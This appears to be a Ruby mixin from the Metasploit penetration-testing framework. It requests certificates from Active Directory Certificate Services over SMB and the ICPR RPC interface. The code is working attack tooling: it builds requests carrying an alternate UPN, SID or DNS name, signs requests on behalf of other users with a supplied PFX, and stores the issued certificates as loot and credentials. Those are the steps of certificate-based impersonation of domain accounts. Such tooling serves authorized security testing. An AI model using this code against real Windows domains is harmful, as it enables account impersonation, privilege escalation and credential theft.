###
#
# This mixin provides methods for interacting with Microsoft Active Directory
# Certificate Services
#
# -*- coding: binary -*-

require 'windows_error/h_result'

module Msf

module Exploit::Remote::MsIcpr

  include Msf::Exploit::Remote::SMB::Client::Authenticated
  include Msf::Exploit::Remote::DCERPC
  include Msf::Auxiliary::Report

  # [2.2.2.7.7.4 szOID_NTDS_CA_SECURITY_EXT](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/e563cff8-1af6-4e6f-a655-7571ca482e71)
  OID_NTDS_CA_SECURITY_EXT = '1.3.6.1.4.1.311.25.2'.freeze
  # [2.2.2.7.5 szOID_NT_PRINCIPAL_NAME](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/ea9ef420-4cbf-44bc-b093-c4175139f90f)
  OID_NT_PRINCIPAL_NAME = '1.3.6.1.4.1.311.20.2.3'.freeze
  # [[MS-WCCE]: Windows Client Certificate Enrollment Protocol](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-winerrata/c39fd72a-da21-4b13-b329-c35d61f74a60)
  OID_NTDS_OBJECTSID = '1.3.6.1.4.1.311.25.2.1'.freeze
  # [[MS-WCCE]: 2.2.2.7.10 szENROLLMENT_NAME_VALUE_PAIR](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/92f07a54-2889-45e3-afd0-94b60daa80ec)
  OID_ENROLLMENT_NAME_VALUE_PAIR = '1.3.6.1.4.1.311.13.2.1'.freeze

  class MsIcprError < StandardError; end
  class MsIcprConnectionError < MsIcprError; end
  class MsIcprAuthenticationError < MsIcprError; end
  class MsIcprNotFoundError < MsIcprError; end
  class MsIcprUnexpectedReplyError < MsIcprError; end
  class MsIcprUnknownError < MsIcprError; end

  def initialize(info = {})
    super

    register_options([
      OptString.new('CA', [ true, 'The target certificate authority' ]),
      OptString.new('CERT_TEMPLATE', [ true, 'The certificate template', 'User' ]),
      OptString.new('ALT_DNS', [ false, 'Alternative certificate DNS' ]),
      OptString.new('ALT_SID', [ false, 'Alternative object SID' ]),
      OptString.new('ALT_UPN', [ false, 'Alternative certificate UPN (format: USER@DOMAIN)' ]),
      OptPath.new('PFX', [ false, 'Certificate to request on behalf of' ]),
      OptString.new('ON_BEHALF_OF', [ false, 'Username to request on behalf of (format: DOMAIN\\USER)' ]),
      Opt::RPORT(445)
    ], Msf::Exploit::Remote::MsIcpr)

    register_advanced_options([
      OptEnum.new('DigestAlgorithm', [ true, 'The digest algorithm to use', 'SHA256', %w[SHA1 SHA256] ])
    ])
  end

  def setup
    errors = {}
    if datastore['ALT_SID'].present? && datastore['ALT_SID'] !~ /^S(-\d+)+$/
      errors['ALT_SID'] = 'Must be a valid SID.'
    end

    if datastore['ALT_UPN'].present? && datastore['ALT_UPN'] !~ /^\S+@[^\s\\]+$/
      errors['ALT_UPN'] = 'Must be in the format USER@DOMAIN.'
    end

    if datastore['ON_BEHALF_OF'].present?
      errors['ON_BEHALF_OF'] = 'Must be in the format DOMAIN\\USER.' unless datastore['ON_BEHALF_OF'] =~ /^[^\s@]+\\\S+$/
      errors['PFX'] = 'A PFX file is required when ON_BEHALF_OF is specified.' if datastore['PFX'].blank?
    end

    @pkcs12 = nil
    if datastore['PFX'].present?
      begin
        @pkcs12 = OpenSSL::PKCS12.new(File.binread(datastore['PFX']))
      rescue StandardError => e
        errors['PFX'] = "Failed to load the PFX file (#{e})"
      end
    end

    raise OptionValidateError, errors unless errors.empty?

    super
  end

  def request_certificate(opts = {})
    tree = opts[:tree] || connect_ipc

    begin
      icpr = connect_icpr(tree)
    rescue RubySMB::Error::UnexpectedStatusCode => e
      if e.status_code == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND
        # STATUS_OBJECT_NAME_NOT_FOUND will be the status if Active Directory Certificate Service (AD CS) is not installed on the target
        raise MsIcprNotFoundError, 'Connection failed (AD CS was not found)'
      end

      elog(e.message, error: e)
      raise MsIcprUnexpectedReplyError, "Connection failed (unexpected status: #{e.status_name})"
    end

    do_request_cert(icpr, opts)

  rescue RubySMB::Dcerpc::Error::FaultError => e
    elog(e.message, error: e)
    raise MsIcprUnexpectedReplyError, "Operation failed (DCERPC fault: #{e.status_name})"
  rescue RubySMB::Dcerpc::Error::DcerpcError => e
    elog(e.message, error: e)
    raise MsIcprUnexpectedReplyError, e.message
  rescue RubySMB::Error::RubySMBError
    elog(e.message, error: e)
    raise MsIcprUnknownError, e.message
  end

  module_function

  def connect_ipc
    begin
      connect
    rescue Rex::ConnectionError => e
      raise MsIcprConnectionError, e.message
    end

    begin
      smb_login
    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
      raise MsIcprAuthenticationError, "Unable to authenticate ([#{e.class}] #{e})."
    end
    report_service(icpr_service_data)

    begin
      simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
    rescue RubySMB::Error::RubySMBError => e
      raise MsIcprConnectionError, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e})."
    end
  end

  def connect_icpr(tree)
    vprint_status('Connecting to ICertPassage (ICPR) Remote Protocol')
    icpr = tree.open_file(filename: 'cert', write: true, read: true)

    vprint_status('Binding to \\cert...')
    icpr.bind(
      endpoint: RubySMB::Dcerpc::Icpr,
      auth_level: RubySMB::Dcerpc::RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
      auth_type: RubySMB::Dcerpc::RPC_C_AUTHN_WINNT
    )
    vprint_good('Bound to \\cert')

    icpr
  end

  def do_request_cert(icpr, opts)
    private_key = OpenSSL::PKey::RSA.new(2048)
    user = opts[:username] || datastore['SMBUser']
    status_msg = "Requesting a certificate for user #{user}"
    alt_dns = opts[:alt_dns] || (datastore['ALT_DNS'].blank? ? nil : datastore['ALT_DNS'])
    alt_sid = opts[:alt_sid] || (datastore['ALT_SID'].blank? ? nil : datastore['ALT_SID'])
    alt_upn = opts[:alt_upn] || (datastore['ALT_UPN'].blank? ? nil : datastore['ALT_UPN'])
    algorithm = opts[:algorithm] || datastore['DigestAlgorithm']
    status_msg << " - alternate DNS: #{alt_dns}" if alt_dns
    status_msg << " - alternate UPN: #{alt_upn}" if alt_upn
    status_msg << " - digest algorithm: #{algorithm}" if algorithm
    csr = build_csr(
      cn: user,
      private_key: private_key,
      dns: alt_dns,
      msext_sid: alt_sid,
      msext_upn: alt_upn,
      algorithm: algorithm
    )

    on_behalf_of = opts[:on_behalf_of] || (datastore['ON_BEHALF_OF'].blank? ? nil : datastore['ON_BEHALF_OF'])
    status_msg << " - on behalf of: #{on_behalf_of}" if on_behalf_of
    if @pkcs12 && on_behalf_of
      vprint_status("Building certificate request on behalf of #{on_behalf_of}")
      csr = build_on_behalf_of(
        csr: csr,
        on_behalf_of: on_behalf_of,
        cert: @pkcs12.certificate,
        key: @pkcs12.key,
        algorithm: algorithm
      )
    end

    cert_template = opts[:cert_template] || datastore['CERT_TEMPLATE']
    status_msg << " - template: #{cert_template}"
    attributes = { 'CertificateTemplate' => cert_template }
    san = []
    san << "dns=#{alt_dns}" if alt_dns
    san << "upn=#{alt_upn}" if alt_upn
    attributes['SAN'] = san.join('&') unless san.empty?

    vprint_status(status_msg)
    response = icpr.cert_server_request(
      attributes: attributes,
      authority: datastore['CA'],
      csr: csr
    )
    case response[:status]
    when :issued
      print_good('The requested certificate was issued.')
    when :submitted
      print_warning('The requested certificate was submitted for review.')
    else
      print_error('There was an error while requesting the certificate.')
      print_error(response[:disposition_message].strip.to_s) unless response[:disposition_message].blank?
      hresult = ::WindowsError::HResult.find_by_retval(response[:disposition]).first

      if hresult
        print_error('Error details:')
        print_error("  Source:  #{hresult.facility}") if hresult.facility
        print_error("  HRESULT: #{hresult}")
      end
    end

    return unless response[:certificate]

    unless (dns = get_cert_san_dns(response[:certificate])).empty?
      print_status("Certificate DNS: #{dns.join(', ')}")
    end

    unless (email = get_cert_san_email(response[:certificate])).empty?
      print_status("Certificate Email: #{email.join(', ')}")
    end

    if (sid = get_cert_msext_sid(response[:certificate]))
      print_status("Certificate SID: #{sid}")
    end

    unless (upn = get_cert_msext_upn(response[:certificate])).empty?
      print_status("Certificate UPN: #{upn.join(', ')}")
    end

    pkcs12 = OpenSSL::PKCS12.create('', '', private_key, response[:certificate])
    # see: https://pki-tutorial.readthedocs.io/en/latest/mime.html#mime-types
    info = "#{simple.client.default_domain}\\#{datastore['SMBUser']} Certificate"

    service_data = icpr_service_data
    credential_data = {
      **service_data,
      address: service_data[:host],
      port: rport,
      protocol: service_data[:proto],
      service_name: service_data[:name],
      workspace_id: myworkspace_id,
      username: upn || datastore['SMBUser'],
      private_type: :pkcs12,
      # pkcs12 is a binary format, but for persisting we Base64 encode it
      private_data: Base64.strict_encode64(pkcs12.to_der),
      origin_type: :service,
      module_fullname: fullname
    }
    create_credential(credential_data)

    stored_path = store_loot('windows.ad.cs', 'application/x-pkcs12', rhost, pkcs12.to_der, 'certificate.pfx', info)
    print_status("Certificate stored at: #{stored_path}")

    pkcs12
  end

  # Make a certificate signing request.
  #
  # @param [String] cn The common name for the certificate.
  # @param [OpenSSL::PKey] private_key The private key for the certificate.
  # @param [String] dns An alternative DNS name to use.
  # @param [String] msext_sid An explicit SID to specify for strong identity mapping.
  # @param [String] msext_upn An alternative User Principal Name (this is a Microsoft-specific feature).
  # @return [OpenSSL::X509::Request] The request object.
  def build_csr(cn:, private_key:, dns: nil, msext_sid: nil, msext_upn: nil, algorithm: 'SHA256')
    request = OpenSSL::X509::Request.new
    request.version = 1
    request.subject = OpenSSL::X509::Name.new([
      ['CN', cn, OpenSSL::ASN1::UTF8STRING]
    ])
    request.public_key = private_key.public_key

    extensions = []

    subject_alt_names = []
    subject_alt_names << "DNS:#{dns}" if dns
    subject_alt_names << "otherName:#{OID_NT_PRINCIPAL_NAME};UTF8:#{msext_upn}" if msext_upn
    unless subject_alt_names.empty?
      extensions << OpenSSL::X509::ExtensionFactory.new.create_extension('subjectAltName', subject_alt_names.join(','), false)
    end

    if msext_sid
      ntds_ca_security_ext = Rex::Proto::CryptoAsn1::NtdsCaSecurityExt.new(OtherName: {
        type_id: OID_NTDS_OBJECTSID,
        value: msext_sid
      })
      extensions << OpenSSL::X509::Extension.new(OID_NTDS_CA_SECURITY_EXT, ntds_ca_security_ext.to_der, false)
    end

    unless extensions.empty?
      request.add_attribute(OpenSSL::X509::Attribute.new(
        'extReq',
        OpenSSL::ASN1::Set.new(
          [OpenSSL::ASN1::Sequence.new(extensions)]
        )
      ))
    end

    request.sign(private_key, OpenSSL::Digest.new(algorithm))
    request
  end

  # Make a certificate request on behalf of another user.
  #
  # @param [OpenSSL::X509::Request] csr The certificate request to make on behalf of the user.
  # @param [String] on_behalf_of The user to make the request on behalf of.
  # @param [OpenSSL::X509::Certificate] cert The public key to use for signing the request.
  # @param [OpenSSL::PKey::RSA] key The private key to use for signing the request.
  # @param [String] algorithm The digest algorithm to use.
  # @return [Rex::Proto::Kerberos::Model::Pkinit::ContentInfo] The signed request content.
  def build_on_behalf_of(csr:, on_behalf_of:, cert:, key:, algorithm: 'SHA256')
    # algorithm needs to be one that OpenSSL supports, but we also need the OID constants defined
    digest = OpenSSL::Digest.new(algorithm)
    unless [ digest.name, "RSAWith#{digest.name}" ].all? { |s| Rex::Proto::Kerberos::Model::OID.constants.include?(s.to_sym) }
      raise ArgumentError, "Can not map digest algorithm #{digest.name} to the necessary OIDs."
    end

    digest_oid = Rex::Proto::Kerberos::Model::OID.const_get(digest.name)

    signer_info = Rex::Proto::Kerberos::Model::Pkinit::SignerInfo.new(
      version: 1,
      sid: {
        issuer: cert.issuer,
        serial_number: cert.serial.to_i
      },
      digest_algorithm: {
        algorithm: digest_oid
      },
      signed_attrs: [
        {
          attribute_type: OID_ENROLLMENT_NAME_VALUE_PAIR,
          attribute_values: [
            RASN1::Types::Any.new(value: Rex::Proto::CryptoAsn1::EnrollmentNameValuePair.new(
              name: 'requestername',
              value: on_behalf_of
            ))
          ]
        },
        {
          attribute_type: Rex::Proto::Kerberos::Model::OID::MessageDigest,
          attribute_values: [RASN1::Types::Any.new(value: RASN1::Types::OctetString.new(value: digest.digest(csr.to_der)))]
        }
      ],
      signature_algorithm: {
        algorithm: Rex::Proto::Kerberos::Model::OID.const_get("RSAWith#{digest.name}")
      }
    )
    data = RASN1::Types::Set.new(value: signer_info[:signed_attrs].value).to_der
    signature = key.sign(digest, data)

    signer_info[:signature] = signature

    signed_data = Rex::Proto::Kerberos::Model::Pkinit::SignedData.new(
      version: 3,
      digest_algorithms: [
        {
          algorithm: digest_oid
        }
      ],
      encap_content_info: {
        econtent_type: Rex::Proto::Kerberos::Model::OID::PkinitAuthData,
        econtent: csr.to_der
      },
      certificates: [{ openssl_certificate: cert }],
      signer_infos: [signer_info]
    )

    Rex::Proto::Kerberos::Model::Pkinit::ContentInfo.new(
      content_type: Rex::Proto::Kerberos::Model::OID::SignedData,
      signed_data: signed_data
    )
  end

  # Get the object security identifier (SID) from the certificate. This is a Microsoft specific extension.
  #
  # @param [OpenSSL::X509::Certificate] cert
  # @return [String, nil] The SID if it was found, otherwise nil.
  def get_cert_msext_sid(cert)
    ext = cert.extensions.find { |e| e.oid == OID_NTDS_CA_SECURITY_EXT }
    return unless ext

    ntds_ca_security_ext = Rex::Proto::CryptoAsn1::NtdsCaSecurityExt.parse(ext.value_der)
    return unless ntds_ca_security_ext[:OtherName][:type_id].value == OID_NTDS_OBJECTSID

    ntds_ca_security_ext[:OtherName][:value].value
  end

  # Get the User Principal Name (UPN) from the certificate. This is a Microsoft specific extension.
  #
  # @param [OpenSSL::X509::Certificate] cert
  # @return [Array<String>] The UPNs if any were found.
  def get_cert_msext_upn(cert)
    return unless (san = get_cert_san(cert))

    san[:GeneralNames].value.select do |gn|
      gn[:otherName][:type_id]&.value == OID_NT_PRINCIPAL_NAME
    end.map do |gn|
      RASN1::Types::Utf8String.parse(gn[:otherName][:value].value, explicit: 0, constructed: true).value
    end
  end

  # Get the SubjectAltName (SAN) field from the certificate.
  #
  # @param [OpenSSL::X509::Certificate] cert
  # @return [Rex::Proto::CryptoAsn1::X509::SubjectAltName] The parsed SAN.
  def get_cert_san(cert)
    ext = cert.extensions.find { |e| e.oid == 'subjectAltName' }
    return unless ext

    Rex::Proto::CryptoAsn1::X509::SubjectAltName.parse(ext.value_der)
  end

  # Get the DNS hostnames from the certificate.
  #
  # @param [OpenSSL::X509::Certificate] cert
  # @return [Array<String>] The DNS names if any were found.
  def get_cert_san_dns(cert)
    return unless (san = get_cert_san(cert))

    san[:GeneralNames].value.select do |gn|
      gn[:dNSName].value?
    end.map do |gn|
      gn[:dNSName].value
    end
  end


  # Get the E-mail addresses from the certificate.
  #
  # @param [OpenSSL::X509::Certificate] cert
  # @return [Array<String>] The E-mail addresses if any were found.
  def get_cert_san_email(cert)
    return unless (san = get_cert_san(cert))

    san[:GeneralNames].value.select do |gn|
      gn[:rfc822Name].value?
    end.map do |gn|
      gn[:rfc822Name].value
    end
  end

  def icpr_service_data
    {
      host: rhost,
      port: rport,
      host_name: simple.client.default_name,
      proto: 'tcp',
      name: 'smb',
      info: "Module: #{fullname}, last negotiated version: SMBv#{simple.client.negotiated_smb_version} (dialect = #{simple.client.dialect})"
    }
  end
end
end
